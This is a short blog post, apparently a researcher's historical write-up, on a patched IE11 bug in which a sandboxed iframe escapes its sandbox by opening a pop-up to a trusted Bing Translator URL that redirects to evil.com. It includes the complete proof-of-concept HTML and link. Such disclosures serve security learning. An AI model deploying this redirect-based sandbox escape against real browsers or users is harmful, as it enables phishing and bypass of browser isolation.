IE11 Sandbox Bypass via Accelerator URLs

I was lucky to find this one while testing the HTML5 sandbox implementation. IE11 had a list of default accelerator URLs — like bing.com and live.com — that were treated as trusted redirectors. Opening a pop-up from a sandboxed iFrame to one of these URLs caused the new window to escape the sandbox entirely.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_SandBox_Bypass_accelerator_URLs</title>
</head>
<body>
<iframe sandbox="allow-popups" src="sandboxed.html" width="600" height="140"></iframe>
</body>
</html>

The sandboxed.html inside the frame contained a link like:

<a href="http://www.bing.com/translator/bv.aspx?a=http://www.evil.com" target="_blank">Bing</a>

Because bing.com was in IE’s accelerator list, the browser granted the new window full trust — removing the sandbox — even though it had originated from a sandboxed frame. The Bing Translator parameter ?a= then redirected to the attacker’s URL, completing the sandbox escape. The allow-popups sandbox flag was all that was needed on the outer frame.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Persistent Keylogger via Resident createPopup] :: [UXSS via XSLT Script and Base Href Origin Confusion] >